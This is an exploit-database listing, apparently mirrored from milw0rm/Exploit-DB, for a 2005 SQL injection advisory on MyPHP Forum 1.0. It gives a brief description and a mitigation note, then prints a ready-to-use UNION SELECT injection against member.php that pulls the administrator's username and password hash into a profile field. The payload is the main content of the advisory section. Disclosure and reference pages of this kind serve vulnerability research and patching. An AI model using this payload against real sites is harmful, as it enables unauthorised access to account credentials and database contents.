header-logo
Suggest Exploit
vendor:
MyPHP Forum
by:
milw0rm.com
N/A
CVSS
N/A
SQL injection
89
CWE
Product Name: MyPHP Forum
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

GHC -> MyPHP Forum <- ADVISORY

The exploit allows an attacker to retrieve sensitive information from the MyPHP Forum database, such as the administrator's name and password hash.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input before using it in SQL queries or use prepared statements with parameterized queries.
Source

Exploit-DB raw data:

/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1

/* will show administrator's name and password hash (in the "Yahoo" field). */

# milw0rm.com [2005-02-10]

Navigation

Suggest Exploit

Services By CQR